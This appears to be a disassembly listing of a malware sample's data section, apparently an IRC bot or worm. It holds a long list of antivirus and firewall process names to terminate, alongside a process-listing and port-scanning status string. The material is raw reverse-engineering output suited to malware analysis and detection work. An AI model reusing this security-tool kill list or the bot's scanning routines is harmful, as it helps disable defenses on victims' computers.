aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: ___:004386E4�o
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: ___:004386E0�o
align 10h
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: ___:004386DC�o
align 10h
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: ___:004386D8�o
align 4
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: ___:004386D4�o
align 4
aMsconfig_exe db 'MSCONFIG.EXE',0 ; DATA XREF: ___:004386D0�o
align 4
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: ___:004386CC�o
align 4
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: ___:004386C8�o
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: ___:004386C4�o
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: ___:004386C0�o
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: ___:004386BC�o
align 4
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: ___:004386B8�o
align 10h
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: ___:004386B4�o
align 4
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: ___:004386B0�o
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: ___:004386AC�o
align 4
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: ___:004386A8�o
align 4
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: ___:004386A4�o
align 4
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: ___:004386A0�o
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: ___:0043869C�o
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: ___:00438698�o
align 4
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: ___:00438694�o
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: ___:00438690�o
align 10h
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: ___:0043868C�o
align 4
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: ___:00438688�o
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: ___:00438684�o
align 4
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: ___:00438680�o
align 4
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: ___:0043867C�o
align 4
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: ___:00438678�o
align 4
aMd_exe db 'MD.EXE',0 ; DATA XREF: ___:00438674�o
align 4
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: ___:00438670�o
align 4
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: ___:0043866C�o
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: ___:00438664�o
; ___:00438668�o
align 4
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: ___:00438660�o
align 4
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: ___:0043865C�o
align 4
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: ___:00438658�o
align 4
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: ___:00438654�o
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: ___:00438650�o
align 10h
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: ___:0043864C�o
align 4
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: ___:00438648�o
align 4
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: ___:00438644�o
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: ___:00438640�o
align 4
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: ___:00438638�o
; ___:0043863C�o
align 10h
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: ___:00438634�o
align 4
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: ___:00438630�o
align 4
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: ___:0043862C�o
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: ___:00438628�o
align 4
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: ___:00438624�o
align 4
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: ___:00438620�o
align 4
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: ___:0043861C�o
align 4
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: ___:00438618�o
align 4
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: ___:00438614�o
align 10h
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: ___:00438610�o
align 10h
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: ___:0043860C�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: ___:00438608�o
align 4
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: ___:00438604�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: ___:00438600�o
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: ___:004385FC�o
align 4
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: ___:004385F8�o
align 10h
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: ___:004385F4�o
align 4
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: ___:004385F0�o
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: ___:004385EC�o
align 4
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: ___:004385E8�o
align 10h
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: ___:004385E4�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: ___:004385E0�o
align 10h
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: ___:004385DC�o
align 4
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: ___:004385D8�o
align 10h
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: ___:004385D4�o
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: ___:004385D0�o
align 4
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: ___:004385CC�o
align 4
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: ___:004385C8�o
align 10h
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: ___:004385C4�o
align 4
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: ___:004385C0�o
align 4
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: ___:004385BC�o
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: ___:004385B8�o
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: ___:004385B4�o
align 4
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: ___:004385B0�o
align 4
aInit_exe db 'INIT.EXE',0 ; DATA XREF: ___:004385AC�o
align 4
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: ___:004385A8�o
align 10h
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: ___:004385A4�o
align 4
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: ___:004385A0�o
align 4
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: ___:0043859C�o
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: ___:00438598�o
align 4
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: ___:00438594�o
align 4
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: ___:00438590�o
align 4
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: ___:0043858C�o
align 10h
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: ___:00438588�o
align 4
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: ___:00438584�o
align 4
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: ___:0043857C�o
; ___:00438580�o
align 4
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: ___:00438578�o
align 4
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: ___:00438574�o
align 4
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: ___:00438570�o
align 4
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: ___:0043856C�o
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: ___:00438568�o
align 10h
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: ___:00438564�o
align 10h
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: ___:00438560�o
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: ___:0043855C�o
align 4
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: ___:00438558�o
align 4
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: ___:00438554�o
align 10h
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: ___:00438550�o
align 4
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: ___:0043854C�o
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: ___:00438548�o
align 4
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: ___:00438544�o
align 4
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: ___:00438540�o
align 4
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: ___:0043853C�o
align 10h
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: ___:00438538�o
align 4
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: ___:00438534�o
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: ___:00438530�o
align 10h
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: ___:0043852C�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: ___:00438528�o
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: ___:00438524�o
align 4
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: ___:00438520�o
align 10h
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: ___:0043851C�o
align 4
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: ___:00438518�o
align 4
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: ___:00438514�o
align 4
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: ___:00438510�o
align 10h
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: ___:0043850C�o
align 4
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: ___:00438508�o
align 4
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: ___:00438504�o
align 4
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: ___:00438500�o
align 4
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: ___:004384FC�o
align 4
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: ___:004384F8�o
align 4
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: ___:004384F4�o
align 4
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: ___:004384F0�o
align 10h
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: ___:004384EC�o
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: ___:004384E8�o
align 4
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: ___:004384E4�o
align 4
aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: ___:004384E0�o
align 4
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: ___:004384DC�o
align 10h
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: ___:004384D8�o
align 4
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: ___:004384D4�o
align 4
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: ___:004384D0�o
align 4
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: ___:004384CC�o
align 10h
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: ___:004384C8�o
align 4
aFast_exe db 'FAST.EXE',0 ; DATA XREF: ___:004384C4�o
align 4
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: ___:004384C0�o
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: ___:004384BC�o
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: ___:004384B8�o
align 10h
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: ___:004384B4�o
align 4
aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: ___:004384B0�o
align 4
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: ___:004384AC�o
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: ___:004384A8�o
align 4
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: ___:004384A4�o
align 4
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: ___:004384A0�o
align 4
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: ___:0043849C�o
align 4
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: ___:00438498�o
align 4
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: ___:00438494�o
align 4
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: ___:00438490�o
align 4
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: ___:0043848C�o
align 4
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: ___:00438488�o
align 4
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: ___:00438484�o
align 4
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: ___:00438480�o
align 4
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: ___:0043847C�o
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: ___:00438478�o
align 4
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: ___:00438474�o
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: ___:00438470�o
align 4
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: ___:0043846C�o
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: ___:00438468�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: ___:00438464�o
align 4
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: ___:00438460�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: ___:0043845C�o
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: ___:00438458�o
align 4
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: ___:00438454�o
align 4
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: ___:00438450�o
align 4
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: ___:0043844C�o
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: ___:00438448�o
align 4
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: ___:00438444�o
align 4
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: ___:00438440�o
align 4
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: ___:0043843C�o
align 10h
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: ___:00438438�o
align 4
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: ___:00438434�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: ___:00438430�o
align 4
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: ___:0043842C�o
align 4
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: ___:00438428�o
align 4
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: ___:00438424�o
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: ___:0043841C�o
align 4
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: ___:00438418�o
align 4
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: ___:00438414�o
aCv_exe db 'CV.EXE',0 ; DATA XREF: ___:00438410�o
align 4
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: ___:0043840C�o
align 4
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: ___:00438408�o
align 4
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: ___:00438404�o
align 4
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: ___:00438400�o
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: ___:004383FC�o
align 4
aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: ___:004383F8�o
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: ___:004383F4�o
align 10h
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: ___:004383F0�o
align 4
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: ___:004383EC�o
align 4
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: ___:004383E8�o
align 4
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: ___:004383E4�o
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: ___:004383E0�o
align 10h
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: ___:004383DC�o
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: ___:004383D8�o
align 4
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: ___:004383D4�o
; ___:00438420�o
align 4
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: ___:004383D0�o
align 4
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: ___:004383CC�o
align 4
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: ___:004383C4�o
; ___:004383C8�o
align 4
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: ___:004383C0�o
align 4
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: ___:004383BC�o
align 10h
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: ___:004383B8�o
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: ___:004383B4�o
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: ___:004383B0�o
align 10h
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: ___:004383AC�o
align 10h
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: ___:004383A8�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: ___:004383A4�o
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: ___:004383A0�o
align 10h
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: ___:0043839C�o
align 4
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: ___:00438398�o
align 4
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: ___:00438394�o
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: ___:00438390�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: ___:0043838C�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: ___:00438388�o
align 4
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: ___:00438384�o
align 4
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: ___:00438380�o
align 4
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: ___:0043837C�o
align 4
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: ___:00438378�o
align 10h
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: ___:00438374�o
align 4
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: ___:00438370�o
align 10h
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: ___:0043836C�o
align 10h
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: ___:00438368�o
align 4
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: ___:00438364�o
align 4
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: ___:00438360�o
align 4
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: ___:0043835C�o
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: ___:00438358�o
align 4
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: ___:00438354�o
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: ___:0043834C�o
; ___:00438350�o
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: ___:00438348�o
align 4
aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: ___:00438344�o
align 4
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: ___:00438340�o
align 4
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: ___:00438338�o
; ___:0043833C�o
align 4
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: ___:00438334�o
align 4
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: ___:00438330�o
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: ___:0043832C�o
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: ___:00438328�o
align 4
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: ___:00438324�o
align 4
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: ___:0043831C�o
; ___:00438320�o
align 4
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: ___:00438318�o
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: ___:00438314�o
align 10h
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: ___:00438310�o
align 10h
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: ___:0043830C�o
align 4
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: ___:00438308�o
align 4
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: ___:00438304�o
aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: ___:00438300�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: ___:004382FC�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: ___:004382F8�o
align 4
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: ___:004382F4�o
align 4
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: ___:004382F0�o
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: ___:004382EC�o
align 4
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: ___:004382E8�o
align 10h
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: ___:004382E4�o
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: ___:004382E0�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: ___:004382DC�o
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: ___:004382D8�o
align 4
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: ___:004382D4�o
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: ___:004382D0�o
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: ___:004382CC�o
align 4
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: ___:004382C8�o
align 4
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: ___:004382C0�o
; ___:004382C4�o
align 4
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: ___:004382B8�o
; ___:004382BC�o
align 4
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: ___:004382B0�o
; ___:004382B4�o
align 4
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: ___:004382A8�o
; ___:004382AC�o
aAu_exe db 'AU.EXE',0 ; DATA XREF: ___:004382A4�o
align 4
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: ___:004382A0�o
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: ___:00438298�o
; ___:0043829C�o
align 4
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: ___:00438294�o
align 4
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: ___:00438290�o
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: ___:0043828C�o
align 10h
aArr_exe db 'ARR.EXE',0 ; DATA XREF: ___:00438288�o
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: ___:00438284�o
align 4
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: ___:00438280�o
align 4
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: ___:0043827C�o
align 4
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: ___:00438278�o
align 4
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: ___:00438274�o
align 4
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: ___:00438270�o
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: ___:0043826C�o
align 10h
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: ___:00438268�o
align 10h
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: ___:00438264�o
align 4
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: ___:00438260�o
align 4
aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: ___:0043825C�o
align 4
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: ___:00438258�o
align 4
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: ___:00438254�o
align 4
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: ___:00438250�o
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: ___:off_43824C�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_415B93+191�o
align 10h
unk_43AD10 db 2 ; DATA XREF: sub_415DC2:loc_415E49�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aProcessListFai db 'Process list failed.',0
align 4
unk_43AD48 db 2 ; DATA XREF: sub_415DC2+80�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aProcessListCom db 'Process list completed.',0
dword_43AD80 dd 7A026E02h, 201F6D1Fh, 6F727028h, 73736563h, 702E7365h
; DATA XREF: sub_415DC2+19�o
dd 671F6C1Fh, 0BB022029h, 202002BBh, 7473694Ch, 20676E69h
dd 636F7270h, 65737365h, 3A73h, 0
aConst db 'const',0
align 10h
dd 0
dword_43ADC4 dd 0 off_43ADC8 dd offset sub_415F27 ; DATA XREF: sub_4162D6+4C�r
aLetter db 'letter',0
align 8
dd 1, 415F85h, 63696E64h, 6Bh, 0
dd 2, 415FD2h
dword_43ADF4 dd 69257325h, 0 ; ___:00416213�o
aSSSSS db '%s|%s|%s|%s|%s|',0 ; DATA XREF: ___:004161ED�o
a99 db '99',0 ; DATA XREF: ___:loc_4161AB�o
align 10h
a0D db '0%d',0 ; DATA XREF: ___:00416185�o
aW: ; DATA XREF: ___:loc_41613C�o
unicode 0, <W>,0
off_43AE18 dd offset byte_4B4E55 ; DATA XREF: ___:0041611C�o
dword_43AE1C dd 345053h dword_43AE20 dd 34h dword_43AE24 dd 335053h dword_43AE28 dd 33h
; =============== S U B R O U T I N E =======================================
sub_43AE2C proc near ; DATA XREF: ___:004160DB�o
push ebx
push eax
xor al, [eax]
sub_43AE2C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43AE30 proc near ; DATA XREF: ___:004160BD�o
push ebx
push eax
xor [eax], eax
sub_43AE30 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dword_43AE34 dd 305053h dword_43AE38 dd 4E55h dword_43AE3C dd 334B32h dword_43AE40 dd 5D64255Bh, 7325hoff_43AE48 dd offset byte_5D4D5B ; DATA XREF: sub_416233+2C�o
; sub_416233+57�o
unk_43AE4C db 2 ; DATA XREF: sub_416343+92�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aIpSPortDIsOp_0 db ' IP: %s Port: %d is open.',0
db 2
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
